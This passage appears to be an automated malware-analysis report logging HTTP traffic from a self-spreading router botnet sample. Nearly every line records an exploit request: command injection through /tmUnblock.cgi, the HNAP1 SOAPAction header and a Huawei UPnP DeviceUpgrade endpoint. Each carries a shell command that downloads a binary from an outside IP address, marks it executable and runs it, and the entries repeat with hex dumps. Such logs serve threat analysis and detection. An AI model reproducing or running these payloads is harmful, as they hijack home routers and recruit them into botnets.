Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping 